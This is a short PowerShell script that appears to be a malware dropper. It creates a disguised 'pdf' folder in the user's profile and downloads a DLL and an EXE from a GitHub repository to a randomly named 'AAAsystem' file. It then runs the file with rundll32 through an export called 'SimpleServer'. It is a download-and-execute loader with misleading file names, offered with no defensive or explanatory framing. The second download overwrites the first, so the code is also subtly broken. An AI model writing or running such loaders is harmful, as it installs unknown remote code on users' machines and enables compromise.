$call = "SimpleServer"
$path_new = $env:USERPROFILE+"\pdf\";
If (-not (Test-Path $path_new)){
	New-Item -Path $path_new -ItemType Directory | Out-Null;
}
$file = "AAAsystem"+ (Get-Random -Maximum 999) + ".dll"
$location = $path_new + $file;
$uri = "https://github.com/iskww/Atlas/raw/main/win32.dll";
$uri2 = "https://github.com/iskww/Atlas/raw/main/reports.exe";
$cli = New-Object System.Net.WebClient;
$cmd = $cli.DownloadFile($uri, $location);
$cmd = $cli.DownloadFile($uri2, $location);
Set-Location $path_new
Start-Process rundll32.exe -ArgumentList "$file, $call" ;
